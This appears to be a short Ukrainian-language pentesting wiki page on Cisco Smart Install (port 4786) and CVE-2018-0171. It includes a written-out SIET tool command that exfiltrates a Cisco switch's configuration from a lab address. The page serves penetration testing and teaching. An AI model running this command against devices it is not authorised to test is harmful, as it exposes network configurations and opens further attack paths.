4786 - Cisco Smart Install

Reading time: 2 minutes

Основна інформація

Cisco Smart Install - це рішення Cisco, призначене для автоматизації початкової конфігурації та завантаження образу операційної системи для нового обладнання Cisco. За замовчуванням Cisco Smart Install активний на обладнанні Cisco і використовує протокол транспортного рівня TCP з номером порту 4786.

Порт за замовчуванням: 4786

PORT      STATE  SERVICE
4786/tcp  open   smart-install

Інструмент експлуатації Smart Install

У 2018 році в цьому протоколі була виявлена критична вразливість, CVE-2018–0171. Рівень загрози становить 9.8 за шкалою CVSS.

Спеціально підготовлений пакет, надісланий на TCP/4786 порт, де активний Cisco Smart Install, викликає переповнення буфера, що дозволяє зловмиснику:

• примусово перезавантажити пристрій
• викликати RCE
• вкрасти конфігурації мережевого обладнання.

Інструмент SIET (Інструмент експлуатації Smart Install) був розроблений для експлуатації цієї вразливості, він дозволяє зловживати Cisco Smart Install. У цій статті я покажу вам, як ви можете прочитати легітимний файл конфігурації мережевого обладнання. Конфігурація ексфільтрації може бути цінною для пентестера, оскільки вона дозволить дізнатися про унікальні особливості мережі. І це полегшить життя та дозволить знайти нові вектори для атаки.

Цільовим пристроєм буде "живий" комутатор Cisco Catalyst 2960. Віртуальні образи не мають Cisco Smart Install, тому ви можете практикуватися лише на реальному обладнанні.

Адреса цільового комутатора 10.10.100.10 і CSI активний. Завантажте SIET і почніть атаку. Аргумент -g означає ексфільтрацію конфігурації з пристрою, аргумент -i дозволяє вам встановити IP-адресу вразливого цільового пристрою.

~/opt/tools/SIET$ sudo python2 siet.py -g -i 10.10.100.10

Конфігурація комутатора 10.10.100.10 буде в папці tftp/